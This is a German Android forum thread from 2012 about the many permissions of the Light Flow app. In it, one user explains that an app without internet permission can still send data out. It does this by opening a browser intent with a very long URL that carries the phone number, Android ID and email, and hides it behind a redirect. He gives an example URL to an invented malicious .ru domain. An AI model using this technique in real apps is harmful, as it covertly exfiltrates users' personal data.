Rechte der Light Flow App

  • Antworten:12
Gelöschter Account
  • Forum-Beiträge: 7.924

23.12.2012, 12:05:23 via Website

habe eben die Light Flow App entdeckt!
Sie benötigt ja echt viele Rechte...

Verstehe ich das richtig dass, angenommen sie hat die böse Absicht "Daten zu sammeln", sie keine Möglichkeit hat, diese weiter zu geben? Sie hat ja schließlich auch keine Internet-Freigabe!

Oder übersehe ich da etwas?

Desire HD > Note 2 LTE > Moto G > OnePlus One [Cyanogen OS | CM11S | root]

und jetzt noch ein Nexus 10 [Android 5 | root]
:D

Antworten
Alain
  • Forum-Beiträge: 11.646

23.12.2012, 12:07:49 via App

Puhhh jede Menge rechte aber ich denke ohne Internet Freigabe is nix mit Daten weitergeben....Vielleicht weiß einer besser bescheid

Die Warheit schmeckt gut wenn man den Bauch voller Lügen hat! ~Muhammad Ali~

Gelöschter Account

Antworten
Gelöschter Account
  • Forum-Beiträge: 7.924

23.12.2012, 14:40:55 via Website

SMS senden kann das Ding ja auch nicht...

Desire HD > Note 2 LTE > Moto G > OnePlus One [Cyanogen OS | CM11S | root]

und jetzt noch ein Nexus 10 [Android 5 | root]
:D

Antworten
Alain
  • Forum-Beiträge: 11.646

23.12.2012, 15:01:15 via Website

Eben an sich "unbedenklich" frag mal Carsten der is ja fit da drin

Die Warheit schmeckt gut wenn man den Bauch voller Lügen hat! ~Muhammad Ali~

Antworten
©h®is
  • Forum-Beiträge: 24.262

23.12.2012, 15:09:46 via App

oder der jörg..

bin mir da mit dem Internet nicht sicher..

StayDirty ツ


Pixel 3a XL [10]

Samsung Tab A 10.5 2018 [9]

⇨Dirty⇦nexus5x [8.1.0]

⇨Dirty⇦ nexus4 [5.0.2] RIP

⇨Dirty⇦ nexus7 (Flo) [6.0.1] RIP

⇨CodefireX⇦desire hd [4.2.2] RIP

Antworten
Gelöschter Account
  • Forum-Beiträge: 5.136

23.12.2012, 15:26:34 via Website

Theoretisch ist es durchaus möglich Daten ins Netz zu übermitteln auch ohne die entsprechende Berechtigung des Internetzugriffs.

Möglich wird das durch Ausnutzung des Intent Managements unter Android. Man ruft einfach einen Browserintent auf und übergibt diesem Intent eine URL. Der Trick dabei ist, die URL zum einen sehr lang zu gestalten so das man unmöglich die gesamte URL in der Adresszeile des Browsers sehen kann. Dann werden die zu übermittelnden Daten einfach an die URL angehängt.

Das kann zum Beispiel so aussehen: http://besonders.langeuniformresourcelocatorurl-ineinemfernenlandmitlauterboesewichten.ru/hierwerdendiedatenentgegengenommen.php?androidID=abc12345678&telefonnummer=066412312312&email=fragmich@nicht.com

(Wer da jetzt draufklickt ist selber Schuld) :grin:

Wenn der inhaber dieser Domain jetzt noch schlau genug ist, einen sofortigen Redirect zum Beispiel zu einer Hilfeseite einzubauen, dann wird eine solche Datenübertragung den meisten fast nicht auffallen.

Ich denke allerdings nicht, dass diese App vergleichbares tut .. auch wenn ich es nicht ausprobiert habe.

— geändert am 23.12.2012, 15:29:55

lg Voss

Antworten
Alain
  • Forum-Beiträge: 11.646

23.12.2012, 15:32:35 via Website

was passiert denn wenn ich auf den link klicke??? Bin neugierig:grin:

Die Warheit schmeckt gut wenn man den Bauch voller Lügen hat! ~Muhammad Ali~

Antworten
©h®is
  • Forum-Beiträge: 24.262

23.12.2012, 15:47:09 via App

Danke Jörg! :)

ich wusste doch, da war was.. (und dass du das weißt)

@alain :lol:

StayDirty ツ


Pixel 3a XL [10]

Samsung Tab A 10.5 2018 [9]

⇨Dirty⇦nexus5x [8.1.0]

⇨Dirty⇦ nexus4 [5.0.2] RIP

⇨Dirty⇦ nexus7 (Flo) [6.0.1] RIP

⇨CodefireX⇦desire hd [4.2.2] RIP

Antworten
Gelöschter Account
  • Forum-Beiträge: 1.776

23.12.2012, 16:22:23 via App

Danke erstmal für die Erklärung Jörg. Wenn ich jetzt auf den Link klicken würde, kommen im Hintergrund Daten auf mein Gerät ? Könnten mir (meinem Handy) die Daten ohne eine entsprechende App Schaden zufügen ?

Antworten
©h®is
  • Forum-Beiträge: 24.262

23.12.2012, 16:29:59 via App

Moritz B
Danke erstmal für die Erklärung Jörg. Wenn ich jetzt auf den Link klicken würde, kommen im Hintergrund Daten auf mein Gerät ? Könnten mir (meinem Handy) die Daten ohne eine entsprechende App Schaden zufügen ?
:lol:

denkst du der jörg würde hier so einen link einstellen?

ist doch nur ein Beispiel.. ;)
der führt nirgendwo hin.

StayDirty ツ


Pixel 3a XL [10]

Samsung Tab A 10.5 2018 [9]

⇨Dirty⇦nexus5x [8.1.0]

⇨Dirty⇦ nexus4 [5.0.2] RIP

⇨Dirty⇦ nexus7 (Flo) [6.0.1] RIP

⇨CodefireX⇦desire hd [4.2.2] RIP

Antworten
Lukinator
  • Forum-Beiträge: 2.519

23.12.2012, 16:30:11 via App

Bei mir kommt beim link nur google

Challenger me von Quizduell : yolopolooreo
(Schreibt mir dann da auch euren AndroidPIT Namen :D )

Antworten
Gelöschter Account
  • Forum-Beiträge: 7.924

23.12.2012, 21:33:09 via App

Moritz B
Stimmt aber bei einem verseuchten Link ?
Bei einem verseuchten Link passiert wohl was. Oder was war genau die Frage?

Hier geht es aber mehr um die App! ;-)

Desire HD > Note 2 LTE > Moto G > OnePlus One [Cyanogen OS | CM11S | root]

und jetzt noch ein Nexus 10 [Android 5 | root]
:D

Antworten